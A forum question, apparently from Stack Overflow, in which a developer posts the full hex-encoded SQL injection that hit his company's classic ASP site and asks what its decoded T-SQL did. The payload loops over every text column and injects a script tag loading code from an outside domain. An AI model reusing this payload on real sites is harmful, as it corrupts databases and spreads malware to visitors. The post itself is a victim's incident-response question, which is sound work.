I wanted to post this here as it is very much coding related and was something I had to clean up this week on one of my company's old ASP (classic) sites.
We got hit with the SQL injection attack that was run just a few days ago, but I'm scratching my head WHAT exactly the 'damage' was to the SQL server (via these SQL queries).
To be honest, I thought it was very ingenious the way this was carried out, and its my companies fault for having an old 10 year old site with little to no sanitized input.
The attack:
122+declare+%40s+varchar%284000%29+set+%40s%3Dcast%280x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e333020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f6c696c75706f7068696c75706f702e636f6d2f736c2e706870223e3c2f7363726970743e3c212d2d27272b525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d2929207768657265204c45465428525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d29292c3137293c3e2727223e3c2f7469746c653e3c7363726970742727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar%284000%29%29+exec%28%40s%29-
What it decodes to: (what I want to understand)
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME
from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
and c.CHARACTER_MAXIMUM_LENGTH>30
and t.table_name=c.table_name
and t.table_type='BASE TABLE'
OPEN Table_Cursor FETCH NEXT
FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title>
<script src="http://lilXXXXXXXop.com/sl.php"></script>
<!--''+RTRIM(CONVERT(VARCHAR(6000),['+@C+'])) where
LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>''"></title><script'' ')
FETCH NEXT
FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
We've recovered a backup (pre injection) and went through the entire app and sanitized all input statements. Our server is firewalled, so no direct SQL access, however I want to know what else could be left over, and I have to admit the SQL query is over my head.
Can someone take a crack at it and explain the attack SQL for me?
APOLOGIES I UPDATED THE FULL DUMP & SQL

SELECT 0xFF;returnsÿwith MySQL, you may want to explore this path. – Vincent Savard Dec 5 '11 at 1:59